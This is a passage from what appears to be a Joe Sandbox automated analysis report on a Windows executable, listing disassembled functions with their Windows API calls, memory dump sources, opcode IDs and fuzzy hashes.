                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2176759853-0
                                                                                • Opcode ID: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
                                                                                • Instruction ID: 1d9be78faac933c7c2fae42cc5bb311f51e3d7e56c5cb99055295bcf28f37150
                                                                                • Opcode Fuzzy Hash: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
                                                                                • Instruction Fuzzy Hash: FB21C076A28BC181EA108B65A84817EB361FB89FD4F185235EF9D53B96CF3CD590C740
                                                                                Function 00007FF655941F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1875163511-0
                                                                                • Opcode ID: 3184854c0548f34c7a90d4258170e6c5642c10e35e78a0ba32f0d1228a2c41a2
                                                                                • Instruction ID: 632930a6ca82d0aa367f4dbc8d56ca6e7ba5f604a57a965aa8d686258a3a5eb5
                                                                                • Opcode Fuzzy Hash: 3184854c0548f34c7a90d4258170e6c5642c10e35e78a0ba32f0d1228a2c41a2
                                                                                • Instruction Fuzzy Hash: 62318116A096C691FB249714E44C3B9A3E0FB40F8CF5C4031D29DA6AAADF6CED96C301
                                                                                Function 00007FF655933D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                • Instruction ID: 23f20b842b88814b96a473fb5c9f27b6695901a63c2f974abda9a302f51c4196
                                                                                • Opcode Fuzzy Hash: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                • Instruction Fuzzy Hash: 2821FB26A187C181EE208F29E44D2A963A1FF84F98F184230EA9D92696DF3CD944C640
                                                                                Function 00007FF6559331BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3118131910-0
                                                                                • Opcode ID: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                • Instruction ID: aae16c0075eef580b6cb0f8bf8c850bbcc55f7fb9e5568720541e05830f66fb0
                                                                                • Opcode Fuzzy Hash: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                • Instruction Fuzzy Hash: 5921C836A187C181EE108B29F44826E63A0FF85FDCF541230EA9E96A9ADF3CD940C740
                                                                                Function 00007FF6559332BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                • Instruction ID: d0191de39463d9e3fd1a19a1aabd00f8602f00f7946d238e690ab54eefb2939b
                                                                                • Opcode Fuzzy Hash: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                • Instruction Fuzzy Hash: 42217476A187C181EA108B2DE44816963A1FFC9FA8F584231EA9D93BD6DF3CD944C640
                                                                                Function 00007FF65595BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction ID: 14bfdc50b2efbdddb01b5dc6003af4543bee963c9d1db9cadb46fe5e23753ea7
                                                                                • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction Fuzzy Hash: D0E0122CA0478546EA546B2158693B913926F55F4AF184438DC0E92397CF3DAC1D4640
                                                                                Function 00007FF65592F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592F895
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592F89B
                                                                                  • Part of subcall function 00007FF655933EC8: FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                • String ID:
                                                                                • API String ID: 3587649625-0
                                                                                • Opcode ID: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                • Instruction ID: 0b21a0f7d9b05405bc518c5a4b5865c3c4f8c4b4140f1f7ab1a6e9a166d028ff
                                                                                • Opcode Fuzzy Hash: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                • Instruction Fuzzy Hash: EF91C337A18BC180EB10DB64D8491AD6361FB84B9CF884135EA5D67AEADF7CD985C300
                                                                                Function 00007FF655923904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 1f58a31ba4ee0f4005a0c8d6f791800edb2061577446e7c94789ea881e83c99d
                                                                                • Instruction ID: fd052b9bdc91effc6f9bd2e62458895e4b7b6144a67fd375f40be006b6347df4
                                                                                • Opcode Fuzzy Hash: 1f58a31ba4ee0f4005a0c8d6f791800edb2061577446e7c94789ea881e83c99d
                                                                                • Instruction Fuzzy Hash: 6D41A26AF1869185FB00DBB1D8492AD2361AF45FDCF585235DE1DB7A9BDF3CD8828200
                                                                                Function 00007FF655932778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF65593274D), ref: 00007FF6559328A9
                                                                                • GetLastError.KERNEL32(?,00007FF65593274D), ref: 00007FF6559328B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction ID: a19ff644435ef3af37d8652698285d264f78fa1911497c1787d749ea32fc70fe
                                                                                • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction Fuzzy Hash: 5131A73AB196D2C2EE604B6AD9486B5A390AF04FDCF1D4131DE5DA7792DF3CEC418640
                                                                                Function 00007FF6559222BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1746051919-0
                                                                                • Opcode ID: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                • Instruction ID: d29fb0e88add09353f007cd2b356515714287ffa6a3c8613c896b1e050d69664
                                                                                • Opcode Fuzzy Hash: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                • Instruction Fuzzy Hash: FD31E326A1878181EA108B55E84836EB360EF84F98F484231EB9C57B96DF3CE9508700
                                                                                Function 00007FF655932AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$BuffersFlushTime
                                                                                • String ID:
                                                                                • API String ID: 1392018926-0
                                                                                • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction ID: 13ed64eda53092b5914524ede836272511c33122dea1e549199798d0a2123ac1
                                                                                • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction Fuzzy Hash: 3821B526E0D7C2D1EE618F91E4087B697A4AF02F9CF1A4031DE4C56296EF3CDC46C200
                                                                                Function 00007FF65593AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                • Instruction ID: 89b3503dfb4c7cf835b2cd6e9517515adfbfc6544939fbe91ebbad1a32e46112
                                                                                • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                • Instruction Fuzzy Hash: 68116379B0968185E6008F16A84816577A5BF94FC8F5C4435CE5EF3B22DF7CE9418345
                                                                                Function 00007FF655932BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                • Instruction ID: 33fb5263323d8a585380ef0fd29a4a2eb6fda6e8fcd4aa43fd13763f6c4d3717
                                                                                • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                • Instruction Fuzzy Hash: 7F119329A086C1C1EB508B65E849269A260FB45FACF5C4331DA7DA62E6CF3CDD86C300
                                                                                Function 00007FF65592255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item$RectText$ClientWindowswprintf
                                                                                • String ID:
                                                                                • API String ID: 402765569-0
                                                                                • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction ID: 4c5b802083ca6510dbfe0e08306d1c15f86c6595acc26a023798f08dc6bceb4e
                                                                                • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction Fuzzy Hash: 33017518A1D3CA41FF556791A86C67993925F45F4CF0C8038D84DA62DBDF2CEC84C301
                                                                                Function 00007FF65593EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65593EBAD,?,?,?,?,00007FF655935752,?,?,?,00007FF6559356DE), ref: 00007FF65593EB5C
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF65593EB6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Process$AffinityCurrentMask
                                                                                • String ID:
                                                                                • API String ID: 1231390398-0
                                                                                • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction ID: 0fb518801a1567b2e7906f2d5484987cad7ce0ad2134cd71a69789f8c005562a
                                                                                • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction Fuzzy Hash: 8CE0E565B186CA82DF098B56C4544E963E2BF88F44B888035E60FD3615DF2CE9498B00
                                                                                Function 00007FF6559521D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1173176844-0
                                                                                • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                • Instruction ID: ab4930e4898d032937c8bb8ab419ca8e84d505b465b226335e10c18262a10425
                                                                                • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                • Instruction Fuzzy Hash: C9E0EC48E0D18745FD1822A21A2E1B940404F19F7EE5C5730DE3EA96C3AF1CACB18250
                                                                                Function 00007FF65595D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                • String ID:
                                                                                • API String ID: 588628887-0
                                                                                • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                • Instruction ID: 11f51fb5e2fb99a08fa872777b3ba309c7d93581672f5a9dc8e262f27fab4560
                                                                                • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
